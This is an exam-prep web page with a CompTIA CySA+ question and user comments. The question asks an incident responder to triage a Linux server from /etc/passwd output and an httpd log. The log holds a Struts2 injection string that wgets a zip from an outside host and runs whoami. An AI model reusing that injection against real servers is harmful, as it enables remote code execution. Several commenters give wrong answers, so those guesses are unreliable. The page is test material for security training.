Deal of The Day! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions
Mail Us support@pass4success.com
Location US
Mob_nav_barsMENU

CompTIA Exam CS0-003 Topic 3 Question 30 Discussion

Actual exam question for CompTIA's CS0-003 exam
Question #: 30
Topic #: 3
[All CS0-003 Questions]

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Show Suggested Answer Hide Answer
Suggested Answer: B

The log output indicates an attempt to execute a command via an unsecured service account, specifically using a wget command to download a file from an external source. This suggests that the adversary is trying to exploit a vulnerability in the web server to run unauthorized commands, which is a common technique for gaining a foothold or further compromising the system. The presence of wget http://grohl.ve.da/tmp/brkgtr.zip indicates an attempt to download and possibly execute a malicious payload.


by Van at Sep 19, 2024, 04:13 AM

Limited Time Offer

25%

Off

Get Premium CS0-003 Questions as Interactive Web-Based Practice Test or PDF

Contribute your Thoughts:

Submit Cancel
Wava
12 days ago
I bet the adversary is trying to 'git' their hands on the server. Get it? Git? Oh, come on, that was a good one!
upvoted 0 times
...
Shakira
20 days ago
Denial-of-service attack on the web server? Pff, that's so 2005. Let's see some real hacking skills here, people.
upvoted 0 times
Socorro
2 days ago
Which of the following is the adversary most likely trying to do?
upvoted 0 times
...
Filiberto
3 days ago
I agree, executing commands through an unsecured service account seems more like what the adversary is trying to do in this case.
upvoted 0 times
...
Lindsey
15 days ago
Yeah, denial-of-service attacks are old news. Real hackers go for more sophisticated techniques.
upvoted 0 times
...
...
Ozell
1 months ago
A backdoor root account named zsh? That's just lazy. At least try to be a little more creative with your attacks, buddy.
upvoted 0 times
Alona
1 days ago
We should definitely investigate further and secure the server.
upvoted 0 times
...
Daron
11 days ago
Yeah, they're probably trying to gain access and control the server.
upvoted 0 times
...
Renay
16 days ago
Looks like they're trying to execute commands through the http service account.
upvoted 0 times
...
Na
17 days ago
Agreed, using a common username like 'root' is a dead giveaway.
upvoted 0 times
...
...
Pearlene
1 months ago
Wow, a beacon to a command-and-control server? This incident just got a whole lot more serious. We need to act fast!
upvoted 0 times
Yuki
12 days ago
Let's make sure to isolate the server from the network to prevent further damage.
upvoted 0 times
...
Laquita
25 days ago
I agree, we should also check for any other signs of compromise on the server.
upvoted 0 times
...
Louann
27 days ago
We need to analyze the situation carefully before taking any action.
upvoted 0 times
...
...
Trinidad
1 months ago
I believe the adversary is trying to execute commands through an unsecured service account.
upvoted 0 times
...
Eun
1 months ago
I agree with Kaycee, it seems like the most likely scenario based on the output.
upvoted 0 times
...
Delfina
2 months ago
Hmm, looks like someone's trying to execute commands through an unsecured service account. That's not good news at all.
upvoted 0 times
Avery
16 days ago
We need to act fast to prevent any further damage to the server.
upvoted 0 times
...
Sharmaine
19 days ago
I'll check the logs to see if there are any other suspicious activities going on.
upvoted 0 times
...
Amina
29 days ago
We should investigate further to see what commands they are trying to run.
upvoted 0 times
...
Cornell
1 months ago
I agree, it seems like they are trying to exploit the http service account.
upvoted 0 times
...
...
Kaycee
2 months ago
I think the adversary is trying to create a backdoor root account named zsh.
upvoted 0 times
...

Save Cancel